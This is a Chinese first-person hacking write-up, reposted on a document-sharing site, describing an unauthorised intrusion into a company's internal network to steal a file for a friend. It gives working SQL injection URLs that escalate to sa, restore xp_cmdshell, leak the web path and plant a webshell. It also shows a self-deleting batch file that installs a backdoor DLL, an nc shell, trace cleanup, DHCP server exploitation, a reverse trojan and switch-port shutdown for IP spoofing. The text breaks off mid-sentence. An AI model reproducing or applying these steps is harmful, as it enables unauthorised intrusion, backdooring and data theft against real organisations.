入侵内网一般过程.docx
《入侵内网一般过程.docx》由会员分享,可在线阅读,更多相关《入侵内网一般过程.docx(5页珍藏版)》请在冰豆网上搜索。
渗透国内某知名公司内部局域网经过
来源:
未知时间:
2009-08-0613:
25编辑:
菇在江湖
本文的目标是一国内知名公司的网络,本文图片、文字都经过处理,均为伪造,如有雷同,纯属巧合。
最近一个网友要我帮他拿他们公司内网一项重要的文件,公司网络信息朋友都mail给我了,这些信息主要是几张网络拓扑图以及在内网嗅探到的信息(包括朋友所在的子网的设备用户名及密码等信息……)。
参照以上信息总体整理了一下入侵的思路,如果在朋友机器安装木马,从内部连接我得到一个CMDShell,须要精心伪装一些信息还有可能给朋友带来麻烦,所以选择在该网络的网站为突破口,而且管理员不会认为有“内鬼”的存在。
用代理上肉鸡,整体扫描了一下他的网站,只开了80端口,没扫描出来什么有用的信息,就算有也被外层设备把信息过滤掉了,网站很大整体是静态的网页,搜索一下,查看源文件->查找->.asp。
很快找到一个类似http:
//www.*****.com/news/show1.asp?
NewsId=125272页面,在后面加上and1=1、and1=2前者正常,后者反回如下错误。
MicrosoftOLEDBProviderforODBCDrivererror'80040e14'
[Microsoft][ODBCSQLServerDriver][SQLServer]Unclosedquotationmarkbeforethecharactersting”.
/news/show/show1.asp,行59
是IIS+MSSQL+ASP的站,在来提交:
http:
//www.*****.com/news/show1.asp?
NewsId=125272and1=(selectis_srvrolemember('sysadmin'))
http:
//www.*****.com/news/show1.asp?
NewsId=125272and'sa'=(selectsystem_user)
结果全部正常,正常是说明是当前连接的账号是以最高权限的SA运行的,看一下经典的“sp_cmdshell”扩展存储是否存在,如果存在那就是初战告捷。
http:
//www.*****.com/news/show1.asp?
NewsId=125272and1=(selectcount(*)frommaster.dbo.sysobjectswherextype=‘x’andname='xp_cmdshell')
失败,看看是否可以利用xplog70.dll恢复,在提交:
http:
//www.*****.com/news/show1.asp?
NewsId=125272;execmaster.dbo.sp_addextendedproc'xp_cmdshell',’xplog70.dll’
在试一下xp_cmdshell是否恢复了,又失败了,看样管理是把xp_cmdshell和xplog70.dll删除了,想利用xp_cmdshell“下载”我们的木马现在是不可能的。
首先我们先要得到一个WEBShell,上传xplog70.dll,恢复xp_cmdshell在利用xp_cmdshell运行我们上传的木马,这都是大众入侵思路了,前辈们以经无数人用这个方法入侵成功。
拿出NBSI扫一下,一会后台用户名和密码是出来了,可是后台登录地址扫不出来,测试了N个工具、手工测试也没结果,有可能管理员把后台删除了。
我们想办法得到网站的目录,这时就须要用到xp_regread、sp_makewebtask两个扩展存储,试一下是否存在:
http:
//www.*****.com/news/show1.asp?
NewsId=125272and1=(selectcount(*)frommaster.dbo.sysobjectswherename='xp_regread')
http:
//www.*****.com/news/show1.asp?
NewsId=125272and1=(selectcount(*)frommaster.dbo.sysobjectswherextype='X'andname='sp_makewebtask')
全部返回正常说明存在(一般的网管不太了解他们,存在也很正常),首先简单介绍一下xp_regread扩展存储过程及sp_makewebtaskWeb助手存储过程,xp_regread是用来读取注册表信息的,我们可以通过这个来得到保存在注册表中的Web绝对路径。
sp_makewebtask这个就是我们用来得到WEBShell的,主要功能就是导出数据库中表的记录为文件。
这个方法网上很早就出现了,我们网站的目录在注册表里是在HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\,我们在数据库里建一个表,将他存储在表里,在使数据库错误回显在IE里。
http:
//www.*****.com/news/show1.asp?
NewsId=125272;createtable[dbo].[biao]([zhi][char](255));
这时候我们就建了一个名为biao的表,并添加了一个类型为char长度是255的字段,名为zhi,然后添加数据:
http:
//www.*****.com/news/show1.asp?
NewsId=125272;declare@resultvarchar(255)execmaster.dbo.xpregread'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\VirtualRoots','/',@resultoutputinsertintobiao(zhi)values(@result);--
然后暴出WEB绝对路径:
http:
//www.*****.com/news/show1.asp?
NewsId=125272and1=(selectcount(*)frombiaowherezhi>1)
IE返回错误,得到网站的物理路径e:
\inetput\web\,向网站目标写个小网页木马,一个朋友以前写过一个程序,由于只是内部用的,我就不抓图了,网上早就有发布过这种工具,有兴趣下载自己看看吧!
原理都是一样的,如果想手工输入就是麻烦了点,但可以向网站脚本文件写入“一句话木马”在远程提交,以得到一个大马的目的。
登录木马后把自己机器的xplog70.dll上传到网站目录在传一个hacker'sdoor,黑客之门只有一个dll,我们要建一个批处理,名子为run.bat:
@echooff
@rundll32kernel,DllRegisterServersvchost.exe
@delrun.bat
在拿一下文件合并器,将我们建的批处理和dll文件合并成一个exe文件,黑客之门的使用方法我就不多说了,他有详细的使用手册,建议在处理一下,以免传到服务器上被查杀。
黑客之门主要用处是可以利用服务器上所开的任何端口和我通信,现在恢复他的xp_cmdshell扩展存储:
http:
//www.*****.com/news/show1.asp?
NewsId=125272;execmaster.dbo.sp_addextendedproc'xp_cmdshell',’e:
\inetput\web\xplog70.dll’;--
在IE里提交:
execmaster.dbo.xp_cmdshell’e:
\inetput\web\rootkit.exe’rootkit.exe是黑客之门改的名子,注意这个程序要解绑到系统目录如图1。
木马运行后,Nc–vvip80输入密码就得到一个CMDShell,在放一个隐藏的asp木马,简单的把入侵的痕迹清理一下。
以上的方法很早就有了,由于网上资料也很多、本文主要说渗透内网,篇幅有限我就不过多解释了。
渗透内网
这个网络很大共有七个网管,现在当前位置是F网、朋友在B网、目标在A网。
朋友给的资料,目前接入internet的两台设备未知(假设未知的设备都是路由器),图2是该公司大体的网络拓扑图。
掌握B网所有设备用户名密码(朋友之前嗅探到的)。
除A网其它网络可以自由通信,A网内有公司重要信息所以不像其它网,它是不允许任何人访问的,路由不给予转发数据,也就是只进不出的网络,虽然现在的网络是外紧内松,但是想进入目标主机还是有些难度。
怎么跨过设备的限制到达目标呢!
您还要向下看。
现在首要的目的就是让router3给我们转发数据包。
首先尝试telnet登录路由,拒绝访问不能登录,我想也不能登录,应该是访问控制列表限制了。
现在我们首要目标拿下router3的控制权,为什么目标定位在router3呢!
我们现在知道他的登录密码;
我当前位置可以和B网直接通信;
Router3是A、B网络公用的,应该两个网管都有权限登录;
这一点也是最重要的,只有router3给予数据转发才可以和目标主机通信;
个人认为router3是最佳路线,现在假设一下,如果B网管理员所管理的设备只有他本身所用的IP或TFTPServer(兼DHCPServer)才可以登录设置,那么有如下思路可以完成入侵。
一般来说管理员主机一定可以登录这台路由器的,网管主机都不可以登录设备那么谁为维护网络呢!
1、直接得到B网管理员主机的一个CMDShell来登录设备。
2、得到管理员同网段一台主机的CMDShell,从而利用ARP欺骗来telnet目标路由。
3、得到B网其它网段中可访问外部网络一台主机的CDMShell,伪装CDMShell主机IP地址,必要情况伪装IP+MAC地址来欺骗路由器,(机会高达到50%)。
经过分析拿B网的DHCP服务器(172.16.101.25)开始,选择突破点也是很重要的,DHCP服务器为了提供这个网段的服务他是暴露在相对外部的,而且不在VLAN的管辖中,还和网管在同一交换机下,而且听朋友说他们公司PC几乎不打补丁,还有很多员工不知补丁为何物,这也给入侵带来及大的方便。
利用服务器的WEB木马上传一些流行的溢出程序,直接拿个溢出程序溢出他的DHCP服务器,(最后才知道2003年的溢出程序对这个主机都有用)成功得到一个System权限的CMDShell。
革命尚未成功,同志们还须努力啊!
“下载”我们肉鸡一个反弹的木马,我们的肉鸡是不能主动连接DHCP服务的,好像有点费话。
现在这个主机就是我们在内网的一个接入点,放弃我们刚才控制的那个WEB主机,利用反弹木马开的个CMD。
telnet一下路由,%connectionclosedbyremotehost!
还是连接失败,不能登录路由器,看样只有172.16.101.15这台主机(管理员IP)可以登录了,我们看一下登录他的交换机OK不(一般工作组交换机权限设置不会那么BT)。
telnet172.16.101.253//交换机管理地址
Password:
center>enable
Password:
成功登录,showmac-access、showcdpneighbors、showarp一些命令判断管理员对应的结口,管理员的IP对应的是FastEthernet7/1,这个时候要用到IP地址的欺骗,在此感谢EST长的最难看的哥哥。
#interfaceFastEthernet7/1
#shutdown
当然,这要等网管离开的时候才可以,这就要内外结合了。
这个时候172.16.101.15这台主机在网络上以消失了,我们试一
升级会员 